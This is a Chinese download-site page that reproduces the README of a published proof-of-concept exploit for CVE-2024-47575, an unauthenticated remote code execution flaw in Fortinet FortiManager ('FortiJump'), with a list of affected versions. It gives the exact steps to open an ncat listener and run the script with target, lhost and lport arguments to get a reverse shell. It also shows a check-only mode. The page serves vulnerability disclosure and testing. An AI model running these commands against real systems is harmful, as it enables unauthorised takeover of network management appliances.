首页>编程相关>其他源码
下载

CVE-2024-47575

Fortinet FortiManager 未经身份验证的远程代码执行又名 FortiJump CVE-2024-47575

请参阅我们的博客文章了解技术细节

首先,建立您的 ncat 会话: 

 nc -lvvnp 80

然后,执行我们的检测伪影生成器: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit

要单独检查漏洞,请使用以下选项: 

 python3 CVE-2024-47575.py --target 192.168.1.110 --action check

受影响的版本

 FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

利用作者

此漏洞由 watchTowr (@watchtowrcyber) 的 Sina Kheirkhah (@SinSinology) 编写

关注 watchTowr 实验室

如需最新的安全研究,请关注 watchTowr 实验室团队

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
展开
附加信息
相关应用
为您推荐
相关资讯 全部